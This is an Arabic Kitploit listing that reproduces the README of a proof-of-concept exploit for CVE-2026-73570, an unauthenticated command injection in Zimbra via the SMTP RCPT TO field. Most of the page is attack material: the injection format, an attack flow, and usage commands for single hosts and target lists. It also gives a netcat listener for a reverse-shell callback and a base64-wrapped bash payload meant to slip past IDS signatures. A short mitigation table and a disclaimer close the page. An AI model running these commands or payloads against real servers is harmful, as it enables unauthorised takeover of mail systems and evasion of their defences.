Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-73570 — # حقن أوامر نظام التشغيل عبر إشعارات SNMP في Zimbra — استغلال RCE غير مصادق عبر SMTP (PoC) | Kitploit
أدوات/GitHubGitHub/gabrielunknown/cve-2026-73570
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubgabrielunknown/cve-2026-73570

CVE-2026-73570

# حقن أوامر نظام التشغيل عبر إشعارات SNMP في Zimbra — استغلال RCE غير مصادق عبر SMTP (PoC)

عرض المستودع
1منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-73570 — استغلال RCE عبر إشعارات SNMP في Zimbra ZCS (PoC)

تنفيذ كود عن بُعد غير مصادق عليه عبر حقن أوامر نظام التشغيل في معالج إشعارات SNMP في Zimbra Collaboration Suite.


نظرة عامة

الحقلالقيمة
CVECVE-2026-73570
CVSS 3.18.9 عالية — AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
CWECWE-78 — تحييد غير صحيح للعناصر الخاصة المستخدمة في أمر نظام تشغيل
المتأثرZimbra ZCS < 10.1.20 (مع تثبيت zimbra-snmp)
تم الإصلاح فيZCS 10.1.20 — يوليو 2026
CISA KEVأُضيف 2026-08-21 (الموعد النهائي للمعالجة FCEB: 2026-08-24)
المصادقة المطلوبةلا شيء
التنفيذ كمستخدممستخدم نظام التشغيل zimbra

السبب الجذري

حزمة zimbra-snmp الاختيارية تتضمن قاعدة swatchdog تتابع /var/log/zimbra.log بحثًا عن أسطر تطابق:

root@kitploit:~
Service status change: <NAME> changed from <STATE> to <STATE>

عند العثور على تطابق، يمرر swatchdog حقل <NAME> الملتقط مباشرة إلى سكربت شل إشعارات SNMP بدون أي تعقيم.

يمكن لمهاجم غير مصادق عليه حقن إدخال سجل مُصمم خصيصًا عن طريق إرسال أمر SMTP RCPT TO مُشكل بشكل خاص. باستخدام جزء محلي مقتبس وفق RFC 5321، يتم تضمين أحرف شل الوصفية — مثل $(...) — داخل <NAME> وتنفيذها عندما يعالج swatchdog سطر السجل الناتج.


الشروط المسبقة

يجب أن تكون الشروط الثلاثة جميعها صحيحة على الهدف لكي تكون الثغرة قابلة للاستغلال:

  • حزمة zimbra-snmp مثبتة
  • إشعارات SNMP مفعلة (snmp_notify = true)
  • خدمة swatchdog قيد التشغيل

تدفق الهجوم

root@kitploit:~
Attacker                          Zimbra MTA
   │                                  │
   │── TCP connect :25/:465/:587 ────►│
   │── EHLO mx-test.invalid ─────────►│
   │── MAIL FROM:<scanner@...> ──────►│
   │── RCPT TO:<"x: Service status    │
   │     change: localhost $(CMD)     │
   │     changed from stopped to      │
   │     running"@cve.invalid> ──────►│
   │                                  │── logs RCPT TO data ──► /var/log/zimbra.log
   │                                  │                               │
   │                                  │                         swatchdog matches
   │                                  │                         pattern, extracts
   │                                  │                         $(CMD), executes
   │◄─────────── shell callback ───────────────────────────────────────┘
  1. الاتصال بالمنفذ 25 / 465 / 587.
  2. إرسال محادثة SMTP قياسية مع RCPT TO المسلح.
  3. يسجل Zimbra بيانات العنوان بغض النظر عن القبول/الرفض.
  4. يطابق swatchdog نمط السجل ويستخرج $(CMD) المحقون.
  5. ينفذ معالج SNMP الأمر CMD كمستخدم نظام التشغيل zimbra.

الاستغلال

المتطلبات

root@kitploit:~
cpan IO::Socket::SSL MIME::Base64 Digest::HMAC_MD5

هدف واحد

root@kitploit:~
perl zimbra-poc.pl -H mail.target.com -r <YOUR_IP> -R 4444

قائمة الأهداف

root@kitploit:~
perl zimbra-poc.pl -f targets.txt -r <YOUR_IP> -R 4444

targets.txt — مضيف واحد لكل سطر، مع :port اختياري، الأسطر التي تبدأ بـ # يتم تجاهلها:

root@kitploit:~
mail.example.com
mail.example.com:25
10.0.0.50:587
# ignored comment

جميع الخيارات

العلمالطويلالافتراضيالوصف
-H--host—اسم مضيف أو عنوان IP لهدف واحد
-f--file—ملف يحتوي على قائمة الأهداف
-p--port587منفذ SMTP الافتراضي
-r--rhost—عنوان IP الخاص بك لاستدعاء الصدفة العكسية
-R--rport4444منفذ المستمع
-t--timeout15مهلة المقبس بالثواني
-S--ssloffTLS مباشر (مفعّل تلقائيًا على المنفذ 465)
-v--verboseoffطباعة حوار SMTP الكامل
-L--logfile—كتابة سجل الجلسة إلى ملف
-h--help—إظهار المساعدة

مثال كامل

root@kitploit:~
# Terminal 1 — start listener
nc -lvnp 4444

# Terminal 2 — run exploit
perl zimbra-poc.pl -H mail.target.com -r 10.10.10.1 -R 4444 -v

تقنية الحمولة

يتم ترميز أمر الصدفة العكسية بـ base64 قبل الحقن:

root@kitploit:~
echo <b64>|base64 -d|bash

يمنع هذا أنظمة IDS/IPS من مطابقة التوقيعات النصية العادية مثل /dev/tcp أو bash -i أو nc -e. يتم حقن الكتلة المشفرة كـ $(...) داخل الجزء المحلي المقتبس من RCPT TO، مما يؤدي إلى التنفيذ على الخادم عندما يعالج swatchdog إدخال السجل.


التخفيف

الإجراءالتفاصيل
التصحيحالترقية إلى Zimbra ZCS ≥ 10.1.20
تعطيل إشعار SNMPzmprov mcf zimbraSnmpNotifyEnabled FALSE && zmconfigdctl restart
إزالة الحزمةapt remove zimbra-snmp / yum remove zimbra-snmp
ضوابط الشبكةتقييد SMTP الوارد (25/465/587) إلى المرحلات الموثوقة حيثما كان ذلك ممكنًا تشغيليًا

المراجع

  • NVD — CVE-2026-73570
  • Zimbra Security Advisories
  • CISA Known Exploited Vulnerabilities — CVE-2026-73570
  • CERT.pl advisory
  • BiuTrap/CVE-2026-73570

إخلاء المسؤولية

تم إصدار هذا الإثبات المفاهيمي لأغراض اختبار الأمان المصرح به والبحث الأكاديمي والأغراض الدفاعية فقط.
تشغيله ضد أنظمة لا تملكها أو تفتقر إلى إذن كتابي صريح لاختبارها غير قانوني.
لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.


تنزيل الأداة